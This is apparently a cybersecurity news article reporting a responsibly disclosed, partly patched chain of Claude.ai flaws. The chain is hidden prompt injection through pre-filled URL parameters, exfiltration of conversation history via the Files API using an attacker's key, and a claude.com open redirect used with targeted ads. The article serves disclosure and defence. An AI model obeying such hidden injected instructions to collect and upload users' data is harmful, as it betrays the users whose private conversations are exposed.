Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Ransomware Victims Jump to 7,831 as AI Crime Tools Scale Global
May 1, 2026
Deep#Door Stealer Harvests Passwords, Cloud Browser Tokens
May 1, 2026
China-Aligned Attackers Use ShadowPad, IOX Proxy WMIC Multi-Stage
May 1, 2026
Home/CyberSecurity News/Critical Claude Vulnerabilities Exfiltrate Data & Redirect Users
CyberSecurity News

Critical Claude Vulnerabilities Exfiltrate Data & Redirect Users

Three chained vulnerabilities have been discovered in Anthropic’s widely used AI assistant, Claude.ai. These critical flaws allow attackers to silently exfiltrate sensitive conversation data...

Emy Elsamnoudy
Emy Elsamnoudy
March 19, 2026 3 Min Read
0 0

Three chained vulnerabilities have been discovered in Anthropic’s widely used AI assistant, Claude.ai. These critical flaws allow attackers to silently exfiltrate sensitive conversation data and redirect unsuspecting users to malicious websites. Exploitation requires no integrations, tools, or MCP server configurations.

The vulnerability chain, collectively dubbed Claudy Day, was responsibly reported to Anthropic through its Responsible Disclosure Program, and the primary prompt injection flaw has since been patched.

The attack exploits three independent weaknesses across the claude.com platform, chaining them into a complete end-to-end compromise pipeline.

Three chained vulnerabilities

Invisible Prompt Injection via URL Parameters: Claude.ai supports pre-filled prompts through URL parameters (claude.ai/new?q=...), a feature that allows users or third parties to open a chat session with pre-loaded text.

Researchers found that certain HTML tags could be embedded within this parameter and rendered invisible in the chat input field — yet fully processed by Claude upon submission.

This allowed attackers to hide arbitrary instructions, including data-extraction commands, within what appeared to be a completely normal prompt, invisible to the victim.

Data Exfiltration via the Anthropic Files API: Claude’s code execution sandbox restricts most outbound network connections but permits traffic to api.anthropic.com.

By embedding an attacker-controlled API key within the hidden prompt injection payload, researchers demonstrated that Claude could be instructed to search the user’s conversation history for sensitive data, compile it into a file, and silently upload it to the attacker’s own Anthropic account via the Files API. The attacker retrieves the exfiltrated data at will; no external tools or third-party integrations are required.

Open Redirect on claude.com: Any URL following the structure claude.com/redirect/<target> would redirect visitors to arbitrary third-party domains without validation.

Researchers demonstrated that this could be weaponized with Google Ads, which validates ads by hostname. An attacker could place a paid search advertisement displaying a trusted claude.com URL that, upon clicking, silently forwarded the victim to the attacker’s malicious injection URL, indistinguishable from a legitimate Claude search result.

Even in a default, out-of-the-box Claude.ai session, conversation history can hold highly sensitive material: business strategy discussions, financial planning, medical concerns, personal relationships, and login-adjacent information.

Through the injection payload, an attacker could instruct Claude to profile the user by summarizing past conversations, extract chats on specific sensitive topics such as a pending acquisition or a health diagnosis, or allow the model to autonomously identify and exfiltrate what it determines to be the most sensitive content.

In enterprise environments with MCP servers, file integrations, or API connections enabled, the blast radius expands significantly. Injected instructions could read documents, send messages on behalf of the user, and interact with any connected business service all executed silently before the user can intervene.

Google Ads’ targeting capabilities, including Customer Match for specific email addresses, further allow attackers to surgically direct this attack at known, high-value individuals.

Anthropic has confirmed that the prompt injection vulnerability has been remediated, with the remaining issues actively being addressed. Organizations relying on Claude.ai or similar AI platforms should audit all agent integrations and disable permissions that are not actively needed, reducing the available attack surface.

Users should be educated that pre-filled prompts and shared Claude links can carry hidden instructions, a threat model most users do not currently consider.

From an enterprise governance perspective, AI agents that hold credentials and take autonomous actions must be treated with the same access controls applied to human users and service accounts, including intent analysis, scoped just-in-time access, and full audit trails.

This disclosure follows Oasis Security’s earlier research into OpenClaw, reinforcing a consistent and growing pattern: AI agents with broad access can be hijacked through a single manipulated input, and legacy identity and access management frameworks were not designed to account for agentic behavior at scale.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackExploitPatchSecurityThreatVulnerability

Share Article

Emy Elsamnoudy

Emy Elsamnoudy

Emy is a cybersecurity analyst and reporter specializing in threat hunting, defense strategies, and industry trends. With expertise in proactive security measures, Emily covers the tools and techniques organizations use to detect and prevent cyber attacks. She is a regular speaker at security conferences and has contributed to industry reports on threat intelligence and security operations. Emily's reporting focuses on helping organizations improve their security posture through practical, actionable insights.

Previous Post

Malicious Pyronut Package Backdoors Telegram Bots With Remote

Next Post

Vibe-Coded” Malware Uses Fake Tools & Campaign CDNs

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Anthropic Launches Claude Security Beta for Enterprise
May 1, 2026
Human-Centric
Beyond the Click: A Human-Centric Approach to Phishing Defense
April 30, 2026
Qilin Ransomware Lists RDP Auth History on Enumerates Authentication
April 30, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Sarah simpson
Sarah simpson
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Detects Critical MongoDB CVE-

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us